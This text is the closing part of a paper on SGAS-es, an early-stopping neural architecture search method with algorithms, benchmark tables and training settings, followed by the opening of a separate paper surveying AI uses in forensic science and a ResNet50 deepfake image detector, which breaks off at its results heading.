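    entropy = -sum(q * math.log(q) for q in p if q > 0.0)
    return 1.0 - entropy / math.log(len(p))

def min_max(values):
    """Assumed form of normalize(.): min-max scaling over all edges of a cell."""
    lo, hi = min(values), max(values)
    if hi == lo:
        return [1.0 for _ in values]
    return [(v - lo) / (hi - lo) for v in values]

def edge_decision(alpha_per_edge, zero_index=0):
    """Algorithm 3: return the edge with the highest score of Eq. (19)."""
    edges = list(alpha_per_edge)
    ei = min_max([edge_importance(alpha_per_edge[e], zero_index) for e in edges])
    sc = min_max([selection_certainty(alpha_per_edge[e], zero_index) for e in edges])
    scores = {e: a * b for e, a, b in zip(edges, ei, sc)}
    return max(scores, key=scores.get), scores

# Invented parameters; index 0 is the Zero Operation on every edge.
alpha_per_edge = {
    (0, 1): [0.0, 0.1, 3.0, 0.2],   # one non-zero operation clearly dominates
    (0, 2): [2.0, 0.0, 0.1, 0.0],   # the Zero Operation dominates
    (1, 2): [0.0, 1.0, 1.0, 1.0],   # non-zero operations are indistinguishable
}
selected, scores = edge_decision(alpha_per_edge)
```

Edge (0, 1) is selected because it combines a small Zero Operation weight with a confident choice among the remaining operations; the other two edges each fail one of the two criteria.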
Algorithm 4: Fix_operation
Input : batch_size: the current batch size, batch_increase: the value by which the batch size is increased each time, arch, edge_index, D_train, D_valid
Output: new_batch_size: the new batch size after increasing, arch, D_train, D_valid
Turn off the gradient calculation of α[edge_index];
new_batch_size ← batch_size + batch_increase;
Reload D_train and D_valid with the new batch size;
return new_batch_size, arch, D_train, D_valid
The larger the normalized Shannon entropy is, the more uncertain the decision is. Therefore, we use the complement of the normalized Shannon entropy as the measure of the decision certainty of a given edge (i, j).
$$SC^{(i,j)} = 1 - \frac{-\sum_{o \in O, \, o \neq zero} P(\alpha_o^{(i,j)}) \log(P(\alpha_o^{(i,j)}))}{\log(|O| - 1)} \tag{18}$$
Finally, the total score of the edge (i, j) is defined as follows:
$$Score^{(i,j)} = normalize(EI^{(i,j)}) \times normalize(SC^{(i,j)}) \tag{19}$$
where normalize(·) means normalizing the values over all edges in a single cell. Given the architecture, Algorithm 3 performs the edge decision: it calculates the scores of all edges and picks the edge with the maximum score.
3.5 Fixing the Operation
After each edge decision, we fix the operation of the chosen edge. That is, (1) degenerates to:
$$\bar{o}^{(i,j)}(x) = o^{(i,j)}(x) \tag{20}$$
where $o^{(i,j)}(x)$ is derived from (2).
Fig. 6. Illustration of SGAS-es
As shown in Algorithm 4, since the mixed operation becomes a fixed operation, we can turn off the gradient calculation of α on that edge. This reduces memory usage, so we can increase the batch size after each edge decision. A larger batch size stabilizes and accelerates the search procedure.
3.6 Put-It-All-Together: SGAS-es
The whole SGAS-es algorithm is shown in Algorithm 5. In each epoch, the Search_valid_func function first performs forward and back propagation via the First-order Approximation and returns the validation performance. Second, the Indicator function evaluates $\lambda_{\max}^{\alpha}$ of this epoch and determines whether it is time to do early stopping. If early stopping is triggered, we replace the current architecture with the architecture corresponding to stop_epoch. If early stopping is triggered or the accumulated epochs of this phase have reached the default decision frequency, we make the edge decision and fix the operation of the edge chosen by the Edge_decision function. Finally, we check whether all edges have been chosen. If so, we break the loop and end the searching procedure. If not, we go to the next epoch and repeat the steps above. Figure 6 illustrates the proposed search algorithm of SGAS-es as a sequence of an initial epoch followed by repeated decision epochs.
Compared with SGAS, SGAS-es requires extra hyperparameters to control the early stopping indicator: the window size w, the constant k, and the threshold T. One may ask how to set these hyperparameters. We use the same values throughout all experiments and show that they give robust and good results: df is 15, w is 3, k is 5, and T is 1.3.
Algorithm 5: SGAS-es
Input : m: the maximum number of epochs to search (= df × total edges), df: the default decision frequency, η_α, η_w, w, k, T, batch_size, batch_increase
Output: arch
prev_stop_epoch ← 1;
Initialize arch;
Load D_train and D_valid with the batch size;
for epoch ← 1 to m do
  valid_performance, arch ← Search_valid_func(D_train, D_valid, arch, η_α, η_w);
  stop, stop_epoch ← Indicator(epoch, prev_stop_epoch, w, k, T, D_train, D_valid, arch);
  if stop or (epoch − prev_stop_epoch) is df then
    if stop then
      arch ← Load_prev_arch(stop_epoch);
      epoch ← stop_epoch;
    end
    prev_stop_epoch ← epoch;
    edge_index ← Edge_decision(arch);
    batch_size, arch, D_train, D_valid ← Fix_operation(batch_size, batch_increase, arch, edge_index);
    if all edges are selected then
      break;
    end
  end
end
return arch
4 Experiment
4.1 NAS-Bench-201
NAS-Bench-201 [9] (also called the NATS-Bench Topology Search Space [15]) fixes all factors of the searching and retraining pipeline, such as hyperparameters, train-test split settings, data augmentation tricks, and the search space, to provide a fair comparison among all NAS algorithms. It includes three datasets: CIFAR-10, CIFAR-100, and ImageNet-16-120 [16], which is a down-sampled version of ImageNet. They are all classic RGB image classification datasets with different numbers of classes and samples. For more detailed settings, please refer to the NAS-Bench-201 paper.
Table 1. Results of SGAS-es on NAS-Bench-201 (Topology Search Space), accuracy in %
Methods | CIFAR-10 Validation | CIFAR-10 Test | CIFAR-100 Validation | CIFAR-100 Test | ImageNet-16-120 Validation | ImageNet-16-120 Test
RSPS | 87.60 ± 0.61 | 91.05 ± 0.66 | 68.27 ± 0.72 | 68.26 ± 0.96 | 39.73 ± 0.34 | 40.69 ± 0.36
DARTS (1st) | 49.27 ± 13.44 | 59.84 ± 7.84 | 61.08 ± 4.37 | 61.26 ± 4.43 | 38.07 ± 2.90 | 37.88 ± 2.91
DARTS (2nd) | 58.78 ± 13.44 | 65.38 ± 7.84 | 59.48 ± 5.13 | 60.49 ± 4.95 | 37.56 ± 7.10 | 36.79 ± 7.59
GDAS | 89.68 ± 0.72 | 93.23 ± 0.58 | 68.35 ± 2.71 | 68.17 ± 2.50 | 39.55 ± 0.00 | 39.40 ± 0.00
SETN | 90.00 ± 0.97 | 92.72 ± 0.73 | 69.19 ± 1.42 | 69.36 ± 1.72 | 39.77 ± 0.33 | 39.51 ± 0.33
ENAS | 90.20 ± 0.00 | 93.76 ± 0.00 | 70.21 ± 0.71 | 70.67 ± 0.62 | 40.78 ± 0.00 | 41.44 ± 0.00
SGAS | 85.06 ± 0.00 | 88.33 ± 0.03 | 70.80 ± 0.65 | 70.76 ± 1.29 | 42.97 ± 20.53 | 43.04 ± 20.76
SGAS-es | 91.40 ± 0.04 | 94.20 ± 0.02 | 73.18 ± 0.10 | 73.27 ± 0.03 | 45.61 ± 0.13 | 46.19 ± 0.04
Optimal | 91.61 | 94.37 (94.37) | 73.49 | 73.51 (73.51) | 46.73 | 46.20 (47.31)
Fig. 7. Searched cell of SGAS-es on NAS-Bench-201 with CIFAR-10
As shown in Table 1, SGAS-es reaches state-of-the-art performance on all datasets in NAS-Bench-201. Compared to the cells searched by DARTS (Fig. 1) and SGAS (Fig. 2), the cell searched by SGAS-es (Fig. 7) shows neither performance collapse nor cascade performance collapse. Therefore, these searched cells are more learnable and lead to better accuracy. Besides, we ran the searching procedure three times with three different random seeds on all datasets and report the mean accuracy ± variance. The variances are close to 0, so SGAS-es gives stable results.
4.2 Fashion-MNIST Dataset
Fashion-MNIST [17] is also an image classification dataset, containing 70,000 gray-scale images of size 28 × 28. The images are divided into ten classes, such as dress, coat, sneaker, and T-shirt. There are 60,000 images in the train set and 10,000 in the test set. Compared to MNIST (the handwritten digits dataset [18]), Fashion-MNIST is more complex and, therefore, more discriminating. In this experiment, we use the DARTS CNN Search Space [1], but we reduce the number of candidate operations from eight to five. According to StacNAS [19], the non-zero operations among these eight can be separated into four groups: skip_connect; avg_pool_3x3 and max_pool_3x3; sep_conv_3x3 and sep_conv_5x5; dil_conv_3x3 and dil_conv_5x5.
Table 2. Results of SGAS-es on Fashion-MNIST
Methods | Accuracy (%) | Params (MB) | Search method
WRN-28-10 + random erasing [21] | 95.92 | 37 | Manual
DeepCaps [22] | 94.46 | 7.2 | Manual
VGG8B [23] | 95.47 | 7.3 | Manual
DARTS (1st) + cutout + random erasing | 96.14 ± 0.04 | 2.25 | Gradient-based
DARTS (2nd) + cutout + random erasing | 96.14 ± 0.13 | 2.31 | Gradient-based
PC-DARTS + cutout + random erasing | 96.22 ± 0.06 | 2.81 | Gradient-based
SGAS + cutout + random erasing | 96.22 ± 0.24 | 3.47 | Gradient-based
SGAS-es + cutout + random erasing | 96.37 ± 0.07 | 3.34 | Gradient-based
(Best) SGAS-es + cutout + random erasing | 96.45 | 3.7 | Gradient-based
Fig. 8. Normal Cells Searched by DARTS (1st ), DARTS (2nd ), SGAS, and SGAS-es on Fashion-MNIST
Operations within each group are correlated with each other. Therefore, the original DARTS CNN search space has a multi-collinearity problem, which may mislead the search result. Also, DLWAS [20] pointed out that, in some cases, a convolution with a 5 × 5 kernel can be replaced by a convolution with a 3 × 3 kernel, which has fewer parameters. As a result, we pruned the candidate operations from eight to five to avoid the multi-collinearity problem and to reduce the size of the derived models. This also reduces memory usage while searching. The five candidate operations are: Zero Operation, skip_connect, max_pool_3x3, sep_conv_3x3, and dil_conv_3x3. For more detailed settings of this experiment, please refer to Appendix A.
According to Table 2, DARTS-based methods easily outperform architectures designed by human experts. Moreover, SGAS-es reaches the best accuracy, 96.45%. As in the NAS-Bench-201 experiment, we ran the searching procedure with three different random seeds and retrained the resulting architectures to verify the stability of SGAS-es. Results are reported as mean accuracy ± standard deviation. SGAS-es shows excellent stability and robustly outperforms the other methods.
Table 3. Results of SGAS-es on EMNIST-Balanced
Methods | Accuracy (%) | Params (MB) | Search method
WaveMix-128/7 [25] | 91.06 | 2.4 | Manual
VGG-5 (Spinal FC) [26] | 91.05 | 3.63 | Manual
TextCaps [27] | 90.46 | 5.87 | Manual
DARTS (1st) + random affine | 91.06 ± 0.11 | 2.25 | Gradient-based
DARTS (2nd) + random affine | 91.14 ± 0.2 | 2.31 | Gradient-based
SGAS + random affine | 91.12 ± 0.04 | 3.47 | Gradient-based
SGAS-es + random affine | 91.25 ± 0.11 | 3.34 | Gradient-based
(Best) SGAS-es + random affine | 91.36 | 3.03 | Gradient-based
Finally, we drew the normal cells derived by DARTS (1st and 2nd order), SGAS, and SGAS-es (Fig. 8). Compared to DARTS, SGAS-es prevented performance collapse. Interestingly, although SGAS did not suffer cascade performance collapse in this experiment, it derived the cell with the worst performance, below SGAS-es and even DARTS: only 95.95% test accuracy. We suppose this is due to the instability caused by making the edge decision of each phase when training is not yet stable enough. This is also reflected in the standard deviation of SGAS, 0.24, which is the largest among these methods.
4.3 EMNIST-Balanced Dataset
EMNIST [24] is an extension of MNIST with handwritten letters. Each sample is a 28 × 28 grayscale image. EMNIST provides six splits (Byclass, Bymerge, Letters, Digits, Balanced, and MNIST), so it contains six benchmarks. Here, we use EMNIST-Balanced because our primary purpose is to compare SGAS-es with other DARTS-based algorithms, not to deal with imbalanced datasets (EMNIST-Bymerge and EMNIST-Byclass). Besides, among the balanced datasets (EMNIST-Letters, EMNIST-Digits, EMNIST-Balanced, and MNIST), EMNIST-Balanced is the most difficult, with only 131,600 samples but 47 classes. The train set contains 112,800 samples and the test set contains 18,800. As reported in [25], it has the lowest state-of-the-art accuracy, 91.06%. Therefore, we use EMNIST-Balanced to further evaluate the performance of DARTS-based algorithms.
In this experiment, we took the cells derived from Fashion-MNIST and retrained them on EMNIST-Balanced from scratch. The primary purpose is to test the transferability of these cells. Liu et al. performed a similar experiment in the DARTS paper [1], deriving cells from an easier dataset and retraining them on a more difficult one. Therefore, this experiment only includes the retraining stage. For more detailed settings of this experiment, please refer to Appendix B.
According to Table 3, we achieve a state-of-the-art accuracy of 91.36% on the EMNIST-Balanced dataset, which is higher than the previous state of the art, WaveMix-128/7 with 91.06%. Besides, the cells derived by SGAS-es have good transferability, with a mean accuracy of 91.25%, which is the best among these DARTS-based approaches. Interestingly, the best cell of SGAS-es on Fashion-MNIST is not the best on EMNIST-Balanced. As reported in the DARTS paper [1], Liu et al. took the best cell searched on the smaller dataset and retrained it on the larger dataset. However, this may not give the best result. Therefore, making the ranking of cells on smaller datasets more consistent with their ranking on larger datasets is an interesting research topic.
5 Conclusion
In summary, we proposed SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator, to solve the instability issue and improve the searching ability of SGAS. With SGAS-es, we achieved state-of-the-art results on NAS-Bench-201: mean test accuracies of 94.20%, 73.27%, and 46.19% on CIFAR-10, CIFAR-100, and ImageNet-16-120, respectively. These scores are better than those of all other DARTS-based methods reported on NAS-Bench-201 and close to the optimal results. The results are also stable, with variances of 0.02, 0.03, and 0.04. On the more complex DARTS CNN Search Space, we showed that SGAS-es also works. On Fashion-MNIST, the best architecture searched by SGAS-es reached a test accuracy of 96.45%. The mean accuracy, 96.37%, is also better than that of the other DARTS-based methods, and the standard deviation, 0.07, indicates that SGAS-es is a stable method. To show the transferability of the architectures searched by SGAS-es, we retrained them on EMNIST-Balanced and achieved 91.36% test accuracy, which is a state-of-the-art result. These experiments confirm that SGAS-es is a robust method that derives architectures with good performance.
Appendix A: Fashion-MNIST Experiment Settings
In the searching stage, we use half of the images in the train set as training images and the other half as validation images. The data augmentation steps are as follows. For training images, we first do a random crop (RandomCrop()) with a height and a width of 32 and a padding of 4. Second, we do a random horizontal flip (RandomHorizontalFlip()). Third, we transform the inputs into tensors and normalize the values of the images between 0 and 1 (ToTensor()). Last, we further normalize (Normalize()) these image values with the mean and the standard deviation of the Fashion-MNIST training images. For validation images, we apply only the last two steps (ToTensor() and Normalize()).
Hyperparameter settings of the searching stage are as follows. The batch size is 32 (128 for PC-DARTS, since only 1/4 of the channels go through the mixed operation), and the batch increase is 8. An SGD optimizer is used for the network weights with an initial learning rate of 0.025, a minimum learning rate of 0.001, a momentum of 0.9, and a weight decay of 0.0003. A cosine annealing scheduler is used for learning rate decay. An Adam optimizer is used for the architecture parameters with a learning rate of 0.0003, a weight decay of 0.001, and beta values of 0.5 and 0.999. Gradient clipping is used with a max norm of 5. For the supernet, the number of initial channels is 16, and the number of cells is 8. For SGAS-es, we set df, w, k, and T to 15, 3, 5, and 1.3, respectively. For the other DARTS-based methods, the number of search epochs is set to 50.
In the retraining stage, we use the whole train set to train the supernet for 600 epochs. The data augmentation steps for the train set and the test set are the same as those for the train set and the validation set in the searching stage, with two additional steps for the train set: a cutout with a length of 16 and a random erase. Hyperparameter settings of the retraining stage are as follows. The batch size is 72. The SGD optimizer has an initial learning rate of 0.025, a momentum of 0.9, and a weight decay of 0.0003. In addition to the weight decay, a drop path with a probability of 0.2 is used for regularization. The cosine annealing scheduler is also used for learning rate decay. The initial channel size is 36, and the number of cells is 20. An auxiliary loss is used with an auxiliary weight of 0.4. The other DARTS-based methods (such as SGAS and PC-DARTS) and the original DARTS in Table 2 follow the same settings, which are similar to the settings used in their own papers.
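For reference, the learning rate decay used in both stages can be written in closed form. The sketch below implements standard cosine annealing without restarts, using the initial and minimum learning rates of the searching stage; updating once per epoch and the horizon of 50 epochs are assumptions made for illustration.

```python
import math

def cosine_annealing_lr(epoch, total_epochs, lr_init=0.025, lr_min=0.001):
    """Learning rate after `epoch` of `total_epochs` under cosine annealing."""
    cosine = math.cos(math.pi * epoch / total_epochs)
    return lr_min + 0.5 * (lr_init - lr_min) * (1.0 + cosine)

# Assumed horizon of 50 epochs, evaluated at the start of every epoch.
schedule = [cosine_annealing_lr(e, 50) for e in range(51)]
```

The schedule starts at the initial learning rate, passes the midpoint between the two rates halfway through, and ends at the minimum learning rate.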
Appendix B: EMNIST-Balanced Experiment Settings
Most experiment settings are the same as those of the retraining stage for Fashion-MNIST. The differences are as follows. We use the whole training set to train the supernet for 200 epochs. The batch size is 96. For each training image, we first resize (Resize()) it to 32 × 32. Second, we apply a random affine transformation (RandomAffine()) with a degree range of (-30, 30), a translation of (0.1, 0.1), a scale range of (0.8, 1.2), and a shear range of (-30, 30). Third, we convert the inputs to tensors and scale the image values to between 0 and 1 (ToTensor()). Last, we further normalize (Normalize()) the inputs with mean and variance equal to 0.5. For each test image, we apply only ToTensor() and Normalize().
References
1. Liu, H., Simonyan, K., Yang, Y.: Darts: differentiable architecture search. arXiv preprint arXiv:1806.09055 (2018)
2. Yang, A., Esperança, P.M., Carlucci, F.M.: NAS evaluation is frustratingly hard. arXiv preprint arXiv:1912.12522 (2019)
3. Zela, A., Elsken, T., Saikia, T., Marrakchi, Y., Brox, T., Hutter, F.: Understanding and robustifying differentiable architecture search. In: International Conference on Learning Representations (2020). https://openreview.net/forum?id=H1gDNyrKDS
4. Xie, L., et al.: Weight-sharing neural architecture search: a battle to shrink the optimization gap. ACM Comput. Surv. (2022)
5. Chen, X., Xie, L., Wu, J., Tian, Q.: Progressive differentiable architecture search: bridging the depth gap between search and evaluation. In: Proceedings of the IEEE International Conference on Computer Vision, pp. 1294–1303 (2019)
6. Liang, H., et al.: Darts+: improved differentiable architecture search with early stopping. arXiv preprint arXiv:1909.06035 (2019)
7. Chen, X., Hsieh, C.-J.: Stabilizing differentiable architecture search via perturbation-based regularization. In: International Conference on Machine Learning, PMLR (2020)
8. Xu, Y., et al.: PC-DARTS: partial channel connections for memory-efficient architecture search. In: International Conference on Learning Representations (2020). https://openreview.net/forum?id=BJlS634tPr
9. Dong, X., Yang, Y.: Nas-bench-201: extending the scope of reproducible neural architecture search. arXiv preprint arXiv:2001.00326 (2020)
10. Li, G., Qian, G., Delgadillo, I.C., Müller, M., Thabet, A., Ghanem, B.: Sgas: sequential greedy architecture search. In: Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (CVPR) (2020)
11. Keskar, N.S., Mudigere, D., Nocedal, J., Smelyanskiy, M., Tang, P.T.P.: On large-batch training for deep learning: generalization gap and sharp minima. arXiv preprint arXiv:1609.04836 (2016)
12. Elsken, T., Metzen, J.H., Hutter, F.: Neural architecture search: a survey. J. Mach. Learn. Res. 20(1), 1997–2017 (2019)
13. Chu, X., Zhou, T., Zhang, B., Li, J.: Fair DARTS: eliminating unfair advantages in differentiable architecture search. In: 16th European Conference on Computer Vision (2020). https://arxiv.org/abs/1911.12126.pdf
14. Finn, C., Abbeel, P., Levine, S.: Model-agnostic meta-learning for fast adaptation of deep networks. In: International Conference on Machine Learning, PMLR (2017)
15. Dong, X., Liu, L., Musial, K., Gabrys, B.: NATS-bench: benchmarking NAS algorithms for architecture topology and size. IEEE Trans. Pattern Anal. Mach. Intell. (TPAMI) 44(7), 3634–3646 (2021)
16. Chrabaszcz, P., Loshchilov, I., Hutter, F.: A downsampled variant of imagenet as an alternative to the cifar datasets. arXiv preprint arXiv:1707.08819 (2017)
17. Xiao, H., Rasul, K., Vollgraf, R.: Fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. arXiv preprint arXiv:1708.07747 (2017)
18. LeCun, Y.: The MNIST database of handwritten digits. http://yann.lecun.com/exdb/mnist/ (1998)
19. Guilin, L., Xing, Z., Zitong, W., Zhenguo, L., Tong, Z.: Stacnas: towards stable and consistent optimization for differentiable neural architecture search (2019)
20. Mao, Y., Zhong, G., Wang, Y., Deng, Z.: Differentiable light-weight architecture search. In: 2021 IEEE International Conference on Multimedia and Expo (ICME), pp. 1–6. IEEE (2021)
21. Zhong, Z., et al.: Random erasing data augmentation. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 34, no. 07 (2020)
22. Rajasegaran, J., Jayasundara, V., Jayasekara, S., Jayasekara, H., Seneviratne, S., Rodrigo, R.: Deepcaps: going deeper with capsule networks. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10725–10733 (2019)
23. Nøkland, A., Eidnes, L.H.: Training neural networks with local error signals. In: International Conference on Machine Learning, pp. 4839–4850. PMLR (2019)
24. Cohen, G., Afshar, S., Tapson, J., Van Schaik, A.: Emnist: extending mnist to handwritten letters. In: 2017 International Joint Conference on Neural Networks (IJCNN), pp. 2921–2926. IEEE (2017)
25. Jeevan, P., Sethi, A.: WaveMix: resource-efficient token mixing for images. arXiv preprint arXiv:2203.03689 (2022)
26. Kabir, H., et al.: Spinalnet: deep neural network with gradual input. arXiv preprint arXiv:2007.03347 (2020)
27. Jayasundara, V., Jayasekara, S., Jayasekara, H., Rajasegaran, J., Seneviratne, S., Rodrigo, R.: Textcaps: handwritten character recognition with very small datasets. In: 2019 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 254–262. IEEE (2019)
Artificial Intelligence in Forensic Science
Nazneen Mansoor¹ and Alexander Iliev¹,²(B)
1 SRH University of Applied Sciences, Berlin, Germany
[email protected]
2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. Artificial intelligence is a rapidly evolving technology that is being used in a variety of industries. This report provides an overview of some artificial intelligence applications used in forensic science. It also describes recent research in various fields of forensics and presents a model that we implemented for a use case in digital forensics.
Keywords: Forensics · CNN · Transfer learning · Deep learning · ResNet50 · Deepfake detection · AI
1 Introduction
Forensic science is the study of evidence, or the use of scientific methods to investigate crimes. Forensic investigation involves extensive research that includes gathering evidence from various sources and combining it to reach logical conclusions. Extracting data from obscure sources can be productive and compelling, but dealing with massive amounts of data can be overwhelming. Forensic data are produced in a wide range of areas, from DNA and fingerprint analysis to anthropology. With the growth of artificial intelligence (AI) in all industries, scientists have carried out various studies to understand how forensic science could benefit from AI technologies. Artificial intelligence plays a significant role in forensics because it allows forensic investigators to automate their strategies and identify insights and information. The use of artificial intelligence technology improves the chances of detecting and investigating crimes. Artificial intelligence could assist forensic experts in handling data effectively and provide a systematic approach at various levels of the investigation. This could save forensic researchers a significant amount of time, giving them more time to work on other projects. AI can discover new things by integrating all of the unstructured data collected by investigators. Unlike traditional forensic identification, artificial intelligence has numerous use cases in forensic science. This report describes artificial intelligence applications used in forensic science, some of the recent studies conducted in this field, and the implementation of a model for an AI use case in digital forensics.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 155–163, 2023. https://doi.org/10.1007/978-3-031-28073-3_11
2 Related Works
Drowning diagnosis is one of the most challenging tasks in forensics because the findings from post-mortem image diagnosis are uncertain. Various studies have addressed this issue. The researchers in [1, 2] used a deep learning approach to classify subjects as drowning or non-drowning cases from post-mortem lung CT images. In [1], they used a computer-aided diagnosis (CAD) system consisting of a deep CNN (DCNN) model, trained with a transfer learning technique based on the AlexNet architecture. For the experiment, they used post-mortem lung CT images from around 280 cases in total, comprising 140 non-drowning cases (3863 images) and 140 drowning cases (3784 images) [1]. They reported better results in detecting drowning cases. In [2], the authors used the same dataset as in [1] with a different deep learning approach based on the VGG16 transfer learning model. The VGG16 model [2] performed better for drowning detection than the AlexNet model used in [1].
The automatic age estimation of human remains or living individuals is a vital research field in forensics. Age estimation using dental X-ray images [3] or MRI data [4] is commonly used in forensic identification, but the conventional methods do not yield good results. To improve performance, the researchers in [3] implemented a deep learning technique to estimate age from dental X-ray images. They used a dental dataset of 27,957 labeled orthopantomogram subjects (16,383 female and 11,574 male). The accuracy of the age prediction for these subjects is verified using their ID card details. The authors focused on the different neural network elements that are useful for age estimation. This paper is relevant to forensic science for estimating age from panoramic radiograph images.
In [4], the researchers proposed automatic age estimation from multi-factorial MRI data of clavicles, hands, and teeth. They used a deep CNN model to predict age, and the dataset consists of 322 subjects aged between 13 and 25 years.
Gender estimation is another significant aspect of forensic identification, particularly in mass disaster situations. In [5], the authors proposed a model to estimate the accuracy of gender prediction from Cone Beam Computed Tomography (CBCT) scans. They used linear measurements of the maxillary sinus from CBCT scans and applied principal component analysis (PCA) to reduce the dimensionality.
With developments in artificial intelligence, face recognition has become a significant research topic that can benefit digital forensics. The researchers in [6] implemented a deep learning system that can analyze image and video files retrieved from forensic evidence. The proposed model in [6] can detect faces or objects in the given images or videos. The model is trained using the YOLOv5 algorithm, a convolutional neural network (CNN) based detector that can be used to detect faces or objects in real-time applications. Their study indicates that algorithms trained using deep learning techniques are well suited to forensic investigations.
Most of the data extracted in digital forensics is unstructured, such as photos, text, and videos. Data extracted from text plays a significant role in digital forensics. Natural language processing (NLP) is a research topic in AI that can also provide relevant information in forensics. In [7], the researchers developed a pipeline to retrieve information from texts using NLP and built models such as named entity recognition (NER) and relation extraction (RE) in any language. Their experimental results indicate that this solution enhances the performance of digital investigation applications. In [8] and [9], the researchers used CNN models to identify Deepfake media in digital forensics.
3 Applications of AI in Forensic Science
Artificial intelligence assists forensic scientists by supporting their judgment and providing techniques that yield better results in various areas. Examples include forensic anthropology (finding the skeletal age or sex), handling large amounts of forensic data, associating specific components in images, and discovering similarities in place, communication, and time. Some of the AI use cases in forensic science are listed below.
3.1 Pattern Recognition
Pattern recognition is one of the main applications of AI in forensic science. It deals with identifying certain types of patterns within massive amounts of data [11]. This can cover patterns in images of a person or place, sequences in text such as emails or messages, and audio patterns in sound files [8, 11]. This pattern matching is based on solid evidence, statistics, and probabilistic reasoning. AI helps identify trends in complex data accurately and efficiently. It also helps detectives find a suspect by providing information about past criminal records. The methodology used for face image pattern recognition is shown in Fig. 1.
3.2 Data Analysis
Digital forensics is a developing field that requires computation and analysis over large, complex datasets [11]. In digital forensics, scientists collect pieces of digital evidence from various networks or computers [13]. These pieces of evidence are useful in various areas of investigation. Artificial intelligence is an efficient tool for dealing with these large datasets [13]. With the help of AI, a meta-analysis of the data extracted from different sources can be conducted. These metadata can be transformed into an understandable and simplified format within a short time [11].
3.3 Knowledge Discovery
Knowledge discovery and data mining are other areas in which artificial intelligence is used.
Knowledge discovery is the technique of deriving useful information and insights from data. Data mining includes AI, probabilistic methods, and statistical analysis, which can gather and analyze large data samples. Using this approach to discover patterns, forensic scientists could apply AI to investigate various crimes.
Fig. 1. Methodology for forensic face sketch recognition [16]
3.4 Statistical Evidence
In forensic science, strong statistical evidence is required to support the arguments and narration [12]. AI helps build graphical models that can be used to support or disprove certain arguments, and thereby to make better decisions. Various computational and mathematical tools in AI help build significant and statistically relevant evidence.
3.5 Providing Legal Solutions
The scientific methods provided by forensic statistics support the legal system with the necessary evidence [12]. With more comprehensive and sophisticated information databases, artificial intelligence provides the legal community with better solutions.
3.6 Creating Repositories
With the increasing demand for storage capacity, forensic investigators find it difficult to store and analyze data related to forensic science [12]. The storage issues can be addressed by building online repositories using AI. These repositories are useful for storing digital forensic data, properties, investigations, and results [13].
3.7 Enhance Communication Between Forensic Team Members
In a forensic investigation, it is necessary to maintain strong communication between forensic statisticians, criminal investigators, lawyers, and others [12]. Miscommunication between these teams could result in misinterpretation of data, which leads to wrong decisions or unfair justice. Artificial intelligence helps bridge the communication gap between the various teams in the forensic field.
4 Proposed Methodology
We implemented a system to detect Deepfake images that can be widely used in digital forensics. With the advancement of technology and the ease of creating fake content, media manipulation has become widespread in recent years [10]. This fake media content is generated using advanced AI technologies such as deep learning algorithms, and hence it is known as “Deepfakes” [15]. As a result, it has become difficult to distinguish original media from fake media with the naked eye. Numerous Deepfake videos and images circulate across social media, and these manipulated videos or images can be a threat to society and could lead to an increase in the number of cybercrimes. With the increasing amount of Deepfake content, there is a high demand for a system that can detect Deepfake videos or images. Artificial intelligence contributes efficiently to detecting this manipulated multimedia content [15]. The proposed system uses a neural network with a transfer learning technique based on the ResNet50 architecture to train our model.
4.1 Data Collection and Pre-processing
The dataset selected to train the model is the Celeb-DF dataset. It includes 590 celebrity videos and 300 additional videos downloaded from YouTube. It also contains 5639 synthesized videos generated from the real celebrity videos. The videos are converted into frames using the cv2 (OpenCV) Python library. Faces are cropped from the frames, giving 19,457 images in total. For training the model, we used 80% of the data, which is around 15,565 images, with 10% for validation and 10% for testing.
Fig. 2. Fake images [14]
Fig. 3. Real images [14]
Figures 2 and 3 show examples of the fake and real images that are part of our dataset. The images are pre-processed using the Keras ImageDataGenerator class.
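The 80/10/10 split of the 19,457 face images can be checked with a few lines of integer arithmetic. This is a minimal sketch: the helper name is hypothetical, and assigning the rounding remainder to the test set is an assumption, since only the approximate training count is stated.

```python
def split_sizes(n_images, train_pct=80, val_pct=10):
    """Return (train, validation, test) counts using integer arithmetic.

    Assumption: whatever is left after flooring the training and
    validation shares goes to the test set.
    """
    n_train = n_images * train_pct // 100
    n_val = n_images * val_pct // 100
    n_test = n_images - n_train - n_val
    return n_train, n_val, n_test


n_train, n_val, n_test = split_sizes(19457)
```

With 19,457 images the training share comes to 15,565, which matches the figure quoted in Sect. 4.1.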
4.2 Training the Model
The model is built on the ResNet50 architecture from Keras Applications, with two additional dense layers and a dropout of 50%. For the activation functions, the rectified linear unit (ReLU) is used in the hidden layer and the sigmoid function is used in the output layer. The number of training epochs is set to 60. For compiling the model, we chose the Stochastic Gradient Descent (SGD) optimizer with a momentum of 0.9 and a learning rate of 0.001, and used binary cross-entropy as the loss function.
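To make the training objective concrete, the following minimal sketch writes out the sigmoid output, the binary cross-entropy loss, and one SGD-with-momentum update for a single scalar weight. It is plain Python for illustration only and is not the Keras implementation used in this work; the function names are hypothetical, and treating label 1 as one of the two classes is an arbitrary convention.

```python
import math


def sigmoid(z):
    """Map a raw score to a probability in (0, 1)."""
    return 1.0 / (1.0 + math.exp(-z))


def binary_cross_entropy(y_true, p_pred, eps=1e-7):
    """Loss for one sample; p_pred is clipped to avoid log(0)."""
    p = min(max(p_pred, eps), 1.0 - eps)
    return -(y_true * math.log(p) + (1 - y_true) * math.log(1.0 - p))


def sgd_momentum_step(weight, grad, velocity, lr=0.001, momentum=0.9):
    """One classical momentum update: v <- m*v - lr*g, then w <- w + v."""
    velocity = momentum * velocity - lr * grad
    return weight + velocity, velocity


# A score of 0 gives probability 0.5, so the loss is ln(2) for either label.
loss = binary_cross_entropy(1, sigmoid(0.0))

# Two consecutive updates with the same gradient: the second step is larger
# because the velocity accumulates.
w, v = sgd_momentum_step(1.0, 2.0, 0.0)
w, v = sgd_momentum_step(w, 2.0, v)
```

The second update moves the weight further than the first, which is the effect the momentum term of 0.9 is meant to provide.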
5 Results
